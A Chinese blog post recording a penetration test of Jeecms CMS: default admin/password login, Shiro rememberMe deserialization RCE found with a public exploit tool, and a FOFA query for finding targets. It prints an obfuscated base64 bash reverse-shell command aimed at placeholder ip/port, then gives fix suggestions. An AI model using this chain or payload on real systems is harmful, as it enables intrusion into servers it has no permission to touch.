Jeecms弱口令和shiro反序列化RCE渗透测试记录

最新推荐文章于 2024-05-31 11:19:49 发布
最新推荐文章于 2024-05-31 11:19:49 发布
阅读量9k 收藏 3
点赞数
文章标签: 信息安全 渗透测试 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118437326
版权

简介

Jeecms 是一个开源企业客户关系管理快速开发基础平台,Java企业应用开源框架,Java EE(J2EE)快速开发框架,使用经典技术组合(Spring、Spring MVC、Apache Shiro、hibernate4、EasyUI、Jqgrid、Bootstrap UI),核心模块如:组织机构、角色用户、权限授权、数据权限、内容管理、工作流等功能。
在企业官网、新闻站点、OA资源管理等多个领域都有应用。

由于使用的Apache Shiro 是低版本的,存在shiro反序列漏洞。

漏洞影响

弱口令进入可获取后台权限,
反序列可rce 反弹shell

影响版本

版本 <=9.3

fofa app="jeecms"

漏洞复现

弱口令登录

访问默认后台登录路径 默认账号 admin/password

/jeeadmin/jeecms/login.do

默认口令可进入后台

shiro反序列RCE
1.任意登录 检测是否存在疑是漏洞点

找到登录入口后,输入用户名和密码点击登录,查看响应头部,是否存在关键指纹
指纹:rememberMe=deleteme 如下图

2.则使用工具进行检测 目标地址填写填写该 request URL

可选择第一选项 一直点击下一步

程序会进行逐个模块检测,当出现 [+] Find Valid Gadget:xxx 则代表存在shiro反序列化漏洞 例如

[*] Trying Gadget: Wicket1
[+] Find Valid Gadget: CommonsCollections10

附:ShiroExploit 工具可使用大佬的
https://github.com/feihong-cs/ShiroExploit-Deprecated

3.可直接执行命令 或者反弹shell

linux环境的情况下 开启监听 进行shell反弹,如何反弹的基础常识笔者不在这里赘述

# 使用自己的vps 进行nc监听后 进行反弹
![在这里插入图片描述](https://img-blog.csdnimg.cn/56d6ea438b424d7ab66fecaef78151b0.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2tlbGVud2FpdA==,size_16,color_FFFFFF,t_70#pic_center)

为了防止被拦截和编码等问题 我们需要进行bash编码
编码工具: http://tool.ymzhan.site/?t=exec-payload

得到 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}

执行命令进行反弹

修复建议

修改默认登录路径
修改弱口令
修改shiro-context.xml最底下rememberMe管理器中的cipherKey

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

欢迎讨论,持续更新中,感谢关注!

烽铃子
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
JEEVMS仓库管理系统任意文件读取漏洞
qq_36334672的博客
03-12 344
JEEVMS仓库管理系统任意文件读取漏洞。
玩了下JeeCms命令执行漏洞
NilLazy的博客
11-26 6748
第一个站点 首先看了下信息,是管理员权限 (好像这种命令执行漏洞都是administrator权限吧。。。 然后就是看下开没开3389了。。 Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:80 0.0.0
某版本JEECMS后台存在通用struts2命令执行漏洞。
"黑色键盘's Bolg"
12-25 1581
某版本JEECMS后台存在通用struts2命令执行漏洞。 可通过谷歌搜索关键字inurl:login/jeecms.do,可获得多个存在st2的漏洞网站 该版本为jeecmsV2.x版本,漏洞系struts2框架自带的一个安全漏洞,由于jeecms在2010年开始停止了对jeecmsV2.X版本的维护,并建议广大用户统一升级到jeecms最新版本,估计还有很多用户至今未升级,在此,我
JEECMS后台任意文件编辑漏洞及拿shell
收集盒 Book box
07-11 5178
JEECMS是基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点 · 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构 安全性做得非常变态,当网站安装完成后就不再允许执行任何目录下的jsp文件了(web.xml配置了过滤器禁止了很多种动态脚本)。     2.x后台: login/Jeecms.do 3.x
【护网必备】Jenkins综合漏洞的利用工具
最新发布
Fly_鹏程万里
05-31 372
CVE-2015-8103/CVE-2016-0788 Jenkins 序列远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1。CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897。本开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。
网站漏洞怎么修复代码漏洞
A_991128a的博客
11-30 1130
jeecms 最近被爆出高危网站漏洞,可以导致网站被上传webshell木马文件,受影响的版本是jeecms V6.0版本到jeecmsV7.0版本。该网站系统采用的是JAVA语言开发,使用的是oracle,mysql,sql数据库,系统支持windows2008,windows2012,以及linux centos系统。
jeecms升级shiro漏洞报错处理
l_degege的专栏
06-11 1085
一、问题描述 jeecmsv9中的shiro是1.4.0,存在漏洞,现在升级到1.6.0 1替换lib文件夹下的13个shiro包 2将cipherKey改成动态生成 https://blog.csdn.net/jlq_diligence/article/details/109790614 添加类、修改shiro-context.xml 3重启部署后报错 二、操作 应该缺少类org.owasp.encoder.Encode。 将encoder-1.2.2.jar放到lib下项目启动成功 https://
jeecms v6 复制和移动栏目报错修改
01-15
jeecms v6 复制和移动栏目报错修改,直接覆盖这个页面就可以了
Apache Shiro教程
12-30
- **测试工具**:Shiro提供测试类,方便进行单元测试和集成测试。 5. **实战示例** - **简单认证**:创建 Realm 实现认证逻辑,配置 SecurityManager,并在 Subject 中调用 login() 方法。 - **角色和权限控制**...
jeecms3.0.1beta 源码(编译) 带common包
07-30
Jeecms 3.0.1 Beta 是一个开源的Java内容管理系统,它的源码被编译后提供了更深入的学习和定制机会。源码分析对于开发者来说是宝贵的资源,可以帮助理解系统的架构和工作原理,从而进行二次开发或者优。在这个...
JeeCms测试站点使用文档.zip
03-17
**JeeCMS测试站点使用文档** JeeCMS是一款基于Java技术开发的内容管理系统,它提供了强大的内容发布、管理、检索等功能,适用于企业网站、新闻资讯站点等多种应用场景。本使用文档主要涵盖了JeeCMS的基本操作、安装...
jeecms-2012.zip
04-14
Jeecms-2012:深入了解企业级内容管理系统》 Jeecms-2012是一款在2012年推出的基于Java技术的企业级内容管理系统(Content Management System,CMS)。这款系统以其高效、易用和强大的功能,赢得了广泛的赞誉和...
JEEWMS 任意文件读取漏洞
2401_83944560的博客
04-11 331
JEEWMS基于JAVA的仓库管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS,OMS,BMS(计费管理系统),TMS,成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业。JEEWMS存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,造成敏感信息泄露。
jeecms明文密码传输漏洞
qq_36397267的博客
06-01 2133
关于jeecms明文密码传输漏洞修改:思路:由于jeecms密码加密采用md532位加密算法,是不可逆过程,数据库存放的是加密后的密码,登陆认证是将前台传入的密码加密后和数据库进行对比,所以往后台提交密码为加密后的密码的话,势必数据库密码也要加密一次,然后做对比就可以了。前台修改://密码框密码进行加密function passwordMd5(){    var x=document.getEle...
JeeCMS v7 SSRF导致任意文件写入
weixin_30443747的博客
04-16 1037
前言: 学习大佬的思路。 from先知社区:https://xz.aliyun.com/t/4809 00X1:   是/ueditor/getRemoteImage.jspx 接口 通过构造upfile 参数造成ssrf,该接口的功能是,读取远程服务器上的资源但是未对资源类型进行判断直接将其写入/u/cms/www/目录下,SSRF和任意文件写入导致该漏洞被黑产利用写入黑页。 00X2...
【原创】JEECMS v6~v7任意文件上传漏洞(1)
weixin_34160277的博客
01-19 1825
文章作者:rebeyond 受影响版本:v6~v7 漏洞说明: JEECMS是国内Java版开源网站内容管理系统(java cms、jsp cms)的简称。该系统基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点;采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构。广泛应用于政府(部委和省级政府部门、市、县、乡及委办局)、教...
jeecmsv8 shiro 分析
chenbo19867758的专栏
09-17 265
/jeeadmin/jeecms/login.do 1.后台登录页面,点击登录提交路径
jeecms使用教程
09-14
您可以通过以下几个步骤学习JEECMS的使用教程: 1. JEECMS官方网站:首先,您可以访问JEECMS的官方网站http://www.jeecms.com。在该网站上,您可以找到各种相关资料和教程,以帮助您解决使用JEECMS过程中遇到的问题。 2. JEECMS官方论坛:除了官方网站,您还可以加入JEECMS官方论坛(http://bbs.jeecms.com)。在论坛中,您可以与其他JEECMS用户交流并提问,技术人员和众多会员会与您一起解答问题。这是一个很好的学习和交流的平台。 3. JEECMS标签使用教程:对于JEECMS的标签使用,您可以参考官方网站和论坛中提供的相应教程。这些教程将介绍如何使用JEECMS标签来调取所需的数据,并制作页面模板。这样,您就可以轻松地在网站上显示所需的数据。 总之,如果您遇到JEECMS的使用问题,建议您首先到官方网站和官方论坛查看相关资料和教程。这些资源将帮助您更好地理解和使用JEECMS

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值